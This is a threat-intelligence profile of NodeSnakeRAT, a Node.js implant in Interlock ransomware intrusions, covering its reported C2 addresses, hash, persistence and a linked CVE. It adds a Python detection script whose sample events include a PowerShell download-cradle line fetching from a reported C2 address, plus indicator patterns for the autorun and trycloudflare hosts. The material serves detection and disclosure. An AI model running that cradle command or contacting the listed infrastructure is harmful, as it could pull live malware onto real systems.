NodeSnakeRAT
NodeSnakeRAT is a JavaScript-based remote access implant associated with Interlock ransomware intrusions. It has been described as an early version of the malware tracked by Mandiant as CORNFLAKE and by Quorum as NodeSnakeRAT.B. In reported Interlock attack chains, MintLoader delivers a legitimate Node.js runtime (node.exe) that executes the malicious JavaScript payload, after which NodeSnakeRAT is used to establish access and support lateral movement across victim networks. Fortinet reporting states that Interlock has used this implant in attacks against education-sector organizations in the United States and the United Kingdom, as well as in at least one reported North American education intrusion.
Observed behavior includes execution via a bundled legitimate Node.js runtime, persistence through an autorun entry named ChromeUpdater, and use of embedded command-and-control infrastructure. Reported NodeSnakeRAT/CORNFLAKE C2 indicators include 216[.]245[.]184[.]181, 212[.]237[.]217[.]182, 168[.]119[.]96[.]41, and several trycloudflare.com subdomains. In one documented case, the initial JavaScript payload was j1wp4vw8.log (SHA1 63FD5E0811C0BCC7DF9FC3D712F39F829A8D6FF0), delivered in a zip archive named download.zip that also contained node.exe, following a PowerShell download cradle from 138[.]199[.]156[.]22:8080/<time_since_epoch>. The reporting directly links NodeSnakeRAT to Interlock post-compromise operations; subsequent activity in those intrusions included use of valid accounts, living-off-the-land techniques, data exfiltration, and eventual ransomware deployment on Windows endpoints and Nutanix environments.
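As an added detection example (not code from this page or from the Mallory service), the following Python flags the behaviours just described over constructed Sysmon-style event records; the event field names, the Run-key location assumed for the ChromeUpdater autorun, and the sample values other than the page's own indicators are assumptions.

```python
# Added detection example: matches the NodeSnakeRAT behaviours reported above against
# constructed Sysmon-style events. Not code from the Mallory page or any vendor.
from typing import Dict, List

# C2 addresses quoted on the page, with the [.] defanging removed for matching.
C2_IPS = {"216.245.184.181", "212.237.217.182", "168.119.96.41", "138.199.156.22"}
TRUSTED_NODE_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\")

def check_event(ev: Dict[str, str]) -> List[str]:
    """Return the NodeSnakeRAT-style behaviours one event matches (empty if none)."""
    hits: List[str] = []
    if ev.get("type") == "process":
        image = ev.get("image", "").lower()
        args = ev.get("cmdline", "").lower().split()[1:]
        # A Node.js runtime outside its normal install path running a script whose
        # extension is not .js (the page's payload was named j1wp4vw8.log).
        if image.endswith("\\node.exe") and not image.startswith(TRUSTED_NODE_DIRS):
            if any(not a.endswith(".js") for a in args):
                hits.append("unpacked_node_runs_non_js_script")
        # A PowerShell command line that references one of the listed addresses.
        if image.endswith("\\powershell.exe") and any(ip in " ".join(args) for ip in C2_IPS):
            hits.append("powershell_cradle_to_known_c2")
    elif ev.get("type") == "registry":
        # Assumption: the ChromeUpdater autorun is a value under a Run key.
        if "\\currentversion\\run" in ev.get("key", "").lower() \
                and ev.get("value_name", "").lower() == "chromeupdater":
            hits.append("chromeupdater_autorun")
    elif ev.get("type") == "network":
        if ev.get("dest_ip", "") in C2_IPS or ev.get("dest_host", "").lower().endswith(".trycloudflare.com"):
            hits.append("connection_to_reported_c2")
    return hits

def triage(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map each event id to the behaviours it matched, omitting clean events."""
    result: Dict[str, List[str]] = {}
    for ev in events:
        hits = check_event(ev)
        if hits:
            result[ev["id"]] = hits
    return result

# Constructed sample telemetry: one benign event and four modelled on the reported chain
# (the 1700000000 path segment stands in for the page's <time_since_epoch> value).
SAMPLE_EVENTS = [
    {"id": "e1", "type": "process", "image": "C:\\Program Files\\nodejs\\node.exe",
     "cmdline": "node.exe C:\\app\\server.js"},
    {"id": "e2", "type": "process", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -c iwr http://138.199.156.22:8080/1700000000 -OutFile download.zip"},
    {"id": "e3", "type": "process", "image": "C:\\Users\\alice\\AppData\\Local\\Temp\\download\\node.exe",
     "cmdline": "node.exe j1wp4vw8.log"},
    {"id": "e4", "type": "registry", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
     "value_name": "ChromeUpdater"},
    {"id": "e5", "type": "network", "dest_ip": "10.0.0.5", "dest_host": "abc-def.trycloudflare.com"},
]

if __name__ == "__main__":
    for event_id, behaviours in triage(SAMPLE_EVENTS).items():
        print(event_id, behaviours)
```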
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Interlock ... concealed ... through the custom Hotta Killer evasion tool, which harnesses a zero-day flaw in the legitimate gaming anti-cheat driver GameDriverx64.sys, tracked as CVE-2025-61155, as part of a Bring Your Own Vulnerable Driver attack. ... kernel termination of security software prior to encryption activities.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
...deploy the MintLoader payload that executed the NodeSnakeRAT implant for lateral network movement...
Techniques & procedures
1 distinct technique documented for this family, organized by ATT&CK tactic.
Command and Control
1 technique: "deploy the MintLoader payload that executed the NodeSnakeRAT implant"
Recent activity
3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A remote access trojan (implant) used for lateral movement within victim networks as part of Interlock’s intrusion chain prior to ransomware delivery.
JavaScript-based implant/RAT used to support initial access and enable lateral movement within victim networks.
Node.js/JavaScript-based implant used as an early-stage foothold and payload dropper; establishes persistence (e.g., autorun 'ChromeUpdater') and drops/executes additional payloads including Interlock RAT across the intrusion.